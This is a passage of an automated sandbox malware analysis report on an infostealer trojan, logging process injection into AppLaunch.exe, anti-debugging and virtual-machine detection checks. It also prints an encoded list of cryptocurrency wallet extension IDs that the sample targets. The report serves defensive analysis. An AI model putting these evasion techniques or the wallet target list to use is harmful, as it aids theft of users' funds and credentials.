                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0DB.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/6@0/1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: 0.3.file.exe.890000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5840
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F8F8B push ecx; ret 0_2_009F8F9E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09CCF0C0 push eax; retf 2_2_09CCF0CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 100192Thread sleep count: 5323 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 2644Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 100060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 5323Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0B794 FindFirstFileExW,0_2_00A0B794
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: AppLaunch.exe, 00000002.00000003.355682780.000000000563F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: AppLaunch.exe, 00000002.00000002.370893266.000000000789F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
                      Source: AppLaunch.exe, 00000002.00000003.355682780.000000000563F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareL55CMH73Win32_VideoController3PO6M_HGVideoController120060621000000.000000-00071796460display.infMSBDAM_Y8M7HFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors_TDYZFA7gP%^
                      Source: AppLaunch.exe, 00000002.00000003.355682780.000000000563F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F91A4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009F91A4
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0EED0 GetProcessHeap,0_2_00A0EED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0C8CA mov eax, dword ptr fs:[00000030h]0_2_00A0C8CA
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2214C mov eax, dword ptr fs:[00000030h]0_2_00A2214C
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A016F9 mov eax, dword ptr fs:[00000030h]0_2_00A016F9
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F9307 SetUnhandledExceptionFilter,0_2_009F9307
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F91A4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009F91A4
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FCA23 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009FCA23
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F95F2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009F95F2

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 53A2008Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
